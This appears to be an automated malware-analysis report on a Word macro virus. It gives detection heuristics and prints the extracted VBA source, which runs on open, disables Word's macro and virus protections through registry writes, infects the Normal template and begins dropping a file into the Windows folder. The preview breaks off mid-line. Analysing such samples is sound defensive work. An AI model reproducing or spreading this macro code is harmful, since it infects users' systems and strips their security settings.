MALICIOUS (Risk Score: 288)

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample contains VBA macros, specifically a Document_Open macro that runs automatically when the document is opened. This macro attempts to lower macro security settings by writing to registry keys such as 'HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security' and 'HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security'. The presence of a Shell() call within the VBA code strongly suggests that it is intended to download and execute a secondary payload, a common malware delivery technique.
Heuristics (6)

| Finding | Severity | Rule | Description |
|---|---|---|---|
| ClamAV: Win.Trojan.Kallisti-1 | critical | CLAMAV_DETECTION | ClamAV detected this file as malware: Win.Trojan.Kallisti-1 |
| VBA macros detected | medium (4 related findings) | OLE_VBA_MACROS | Document contains VBA macro code |
| Shell() call in VBA | critical | OLE_VBA_SHELL | Shell() call in VBA |
| Document_Open macro | high | OLE_VBA_DOCOPEN | Document_Open macro |
| VBA p-code auto-exec with execution tokens | high | OLE_VBA_PCODE_AUTOEXEC_EXEC | Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable. |
| Environ() call (env variable access) | low | OLE_VBA_ENVIRON | Environ() call (env variable access) |
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 | Detection | Obfuscation or payload |
|---|---|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 109216 bytes | f1787ba5a4067b1083278fe00a006bb32ad53b54b4f7a8d220024b86c611283a | ClamAV: Win.Trojan.wmvg-1 | unlikely |
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
On Error Resume Next
'Pothead
'(c) by Necronomikon/ZeroGravity
'----------------------------------------------------------
Word.Application.Options.VirusProtection = n
Word.Application.Options.ConfirmConversions = n
Word.Application.Options.SaveNormalPrompt = n
Select Case Application.Version
Case "10.0"
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "Level") = 1&
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "AccessVBOM") = 1&
CommandBars("Macro").Controls("Security...").Enabled = False
Case "9.0"
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
CommandBars("Macro").Controls("Security...").Enabled = False
End Select
WordBasic.DisableAutoMacros 0
Application.DisplayStatusBar = False
ActiveDocument.ReadOnlyRecommended = False
On Error Resume Next: Randomize
Dim nec1 As Object, nec2 As Object, nec3 As Object, nec4 As Object, nec5 As Object
Dim thc As Object, lsd As Object, dope As Object, weed As Object, coke As Object
Set nec1 = ActiveDocument: Set nec2 = nec1.VBProject: Set nec3 = nec2.VBComponents: Set nec4 = nec3.Item(1): Set nec5 = nec4.CodeModule
Set thc = NormalTemplate: Set lsd = thc.VBProject: Set dope = lsd.VBComponents: Set weed = dope.Item(1): Set coke = weed.CodeModule
pshq = coke.countoflines: zero = nec5.countoflines: gravity = Chr(Int(Rnd * 25) + 65): Chr (Int(Rnd * 25) + 65): Chr (Int(Rnd * 25) + 65)
If pshq < zero Then
For sysnec = 1 To pshq: NT5.replaceline sysnec, gravity: Next sysnec
For sysnec = 1 To zero: peace = nec5.lines(sysnec, 1): coke.insertlines sysnec, peace: Next sysnec
NormalTemplate.Save: End If
If zero < pshq Then
For sysnec = 1 To zero: nec5.replaceline sysnec, gravity: Next sysnec
For sysnec = 1 To pshq: peace = coke.lines(sysnec, 1): nec5.insertlines sysnec, peace: Next sysnec
ActiveDocument.Save: End If
End Sub
Private Sub Document_Close()
On Error Resume Next
Open Environ("WINDIR") & "\pothead.tmp" For Output As #1
Print #1, "n " & Environ("WINDIR") & "\POTHEAD.JPG"
Print #1, "e 0100 FF D8 FF E0 00 10 4A 46 49 46 00 01 01 00 00 01"
Print #1, "e 0110 00 01 00 00 FF DB 00 43 00 06 04 05 06 05 04 06"
Print #1, "e 0120 06 05 06 07 07 06 08 0A 10 0A 0A 09 09 0A 14 0E"
Print #1, "e 0130 0F 0C 10 17 14 18 18 17 14 16 16 1A 1D 25 1F 1A"
Print #1, "e 0140 1B 23 1C 16 16 20 2C 20 23 26 27 29 2A 29 19 1F"
Print #1, "e 0150 2D 30 2D 28 30 25 28 29 28 FF DB 00 43 01 07 07"
Print #1, "e 0160 07 0A 08 0A 13 0A 0A 13 28 1A 16 1A 28 28 28 28"
Print #1, "e 0170 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28"
Print #1, "e 0180 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28"
Print #1, "e 0190 28 28 28 28 28 28 28 28 28 28 28 28 28 28 FF C2"
Print #1, "e 01A0 00 11 08 00 BD 02 37 03 01 22 00 02 11 01 03 11"
Print #1, "e 01B0 01 FF C4 00 1B 00 00 01 05 01 01 00 00 00 00 00"
Print #1, "e 01C0 00 00 00 00 00 00 05 01 02 03 04 06 00 07 FF C4"
Print #1, "e 01D0 00 19 01 00 03 01 01 01 00 00 00 00 00 00 00 00"
Print #1, "e 01E0 00 00 00 00 01 02 03 04 05 FF DA 00 0C 03 01 00"
Print #1, "e 01F0 02 10 03 10 00 00 01 2F 14 10 73 55 D1 D7 03 0E"
Print #1, "e 0200 F8 18 E9 53 96 47 2B A5 14 F3 02 0C ED 05 54 09"
Print #1, "e 0210 36 26 AD 4F A1 CD 95 39 0E CA 55 B0 9F 23 78 68"
Print #1, "e 0220 07 55 95 1D 8B D9 87 39 D0 A6 79 5C E8 9B 9D E1"
Print #1, "e 0230 1D 68 26 0C F2 E7 91 AD 0B B3 BC 07 98 09 8C 3D"
Print #1, "e 0240 10 56 81 89 00 A2 34 F5 46 56 03 8A 0D 40 F3 81"
Print #1, "e 0250 BC 0E 3C 0A 81 A7 04 7A 66 D0 3A 81 87 86 40 37"
Print #1, "e 0260 38 0B 20 42 C8 5A ED 69 22 CA 35 AD 4F 65 A5 0D"
Print #1,
... (truncated)